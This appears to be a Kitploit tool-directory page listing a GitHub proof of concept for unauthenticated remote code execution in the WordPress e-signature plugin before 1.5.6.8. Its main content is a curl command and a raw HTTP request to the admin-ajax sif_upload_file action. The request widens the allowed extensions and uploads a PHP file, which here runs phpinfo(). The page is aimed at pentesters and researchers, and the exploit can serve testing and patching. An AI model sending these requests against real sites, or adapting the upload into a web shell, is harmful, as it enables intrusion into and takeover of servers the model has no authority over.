Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
e-signature-poc — e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution | Kitploit
Tools/GitHubGitHub/randomrobbiebf/e-signature-poc
Vulnerability AnalysisExploitationWeb Application Exploitation
GitHubrandomrobbiebf/e-signature-poc

e-signature-poc

e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution

View Repository
13 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

e-signature-poc

e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution

Curl

root@kitploit:~
curl "http://wordpress.lan/wp-admin/admin-ajax.php?action=sif_upload_file" -X POST -H "Content-Type: multipart/form-data"   -F "[email protected]"   -F "extensions=jpg,png,pdf,php"   -F "filesize=2"   -F "sif_name=example_file"

RAW_HTTP

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=sif_upload_file HTTP/1.1
Host: wordpress.lan
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 544
Content-Type: multipart/form-data; boundary=------------------------04406918fd5cbc2b
Connection: close

--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="file"; filename="test.php3"
Content-Type: application/octet-stream

<?php phpinfo(); ?>

--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="extensions"

jpg,png,pdf,php3
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="filesize"

2
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="sif_name"

example_file3
--------------------------04406918fd5cbc2b--
Download Tool